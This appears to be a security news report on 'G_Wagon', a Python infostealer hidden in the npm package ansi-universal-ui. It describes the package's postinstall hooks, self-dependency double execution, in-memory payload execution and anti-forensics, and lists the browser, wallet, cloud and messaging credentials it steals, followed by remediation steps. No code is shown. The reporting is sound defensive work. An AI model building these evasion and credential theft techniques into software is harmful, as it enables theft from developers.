A highly sophisticated infostealer malware disguised as a legitimate npm UI component library has been targeting developers through the ansi-universal-ui package.
The malware, internally identified as “G_Wagon,” employs multi-stage obfuscation techniques to extract browser credentials, cryptocurrency wallets, cloud authentication keys, and messaging tokens from infected systems.
Despite presenting itself as “a lightweight, modular UI component system for modern web applications,” the package contains zero legitimate UI functionality.
Security researchers first detected the malicious package on January 23, 2026, at 08:46 UTC.
Instead, it delivers a Python-based infostealer that downloads its own runtime environment and executes heavily obfuscated payloads designed to compromise sensitive user data.
Attacker Methodology
Analysis of the package’s version history reveals an unusual level of sophistication and iterative development.
In v1.2.0, they made an interesting change. They removed the npm tar dependency and switched to spawning the system tar command directly.
Between January 21 and January 23, the threat actor published 10 versions, each representing incremental improvements to the attack infrastructure.
Early versions contained only placeholder code testing execution chains. At the same time, later releases added anti-forensics capabilities, hex-encoded command-and-control URLs, and memory-only payload execution.
Version 1.4.0 marked a critical evolution in evasion techniques. Rather than downloading Python payloads to disk where they could be detected by security tools, the malware now fetches base64-encoded code from remote servers, decodes it in memory, and pipes it directly to the Python interpreter via stdin.
The package employs a clever self-dependency trick to achieve double execution. By listing itself as a dependency in package.json, the postinstall hook runs twice during installation, increasing the likelihood of successful compromise. Version 1.3.7 added cleanup code to delete the payload after execution:
The threat actor also sanitized log messages to appear legitimate, changing “Setting up Python environment” to “Initializing UI runtime.”
Data Theft Capabilities
The G_Wagon stealer targets an extensive range of sensitive information. It extracts credentials from Chrome, Edge, and Brave browsers on both Windows and macOS platforms.
On Windows systems, it terminates browser processes and uses Chrome DevTools Protocol to harvest cookies, while decrypting saved passwords through the Windows Data Protection API.
Cryptocurrency wallet theft represents the primary objective. The malware targets over 100 browser wallet extensions including MetaMask, Phantom, Coinbase Wallet, Trust Wallet, Ledger Live, and Exodus.
It copies entire extension data directories for wallets spanning Ethereum, Solana, Cosmos, Polkadot, Cardano, and numerous other blockchain ecosystems.
Cloud credentials pose another significant target. The stealer copies AWS CLI, Azure CLI, and Google Cloud SDK credential files, along with SSH keys and Kubernetes configuration files.
Discord tokens, Telegram data directories, and Steam authentication files also fall within its scope.
Stolen data is compressed and uploaded to Appwrite storage buckets hosted on both NYC and Frankfurt servers. For large files, the malware chunks data into 5MB pieces to ensure reliable transmission.
The code even includes an embedded Windows DLL that gets injected into browser processes using NT native APIs for deeper system access.
Affected users should immediately remove ansi-universal-ui, rotate all browser-saved passwords, revoke cryptocurrency wallet credentials, regenerate cloud service keys, and invalidate messaging application sessions.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.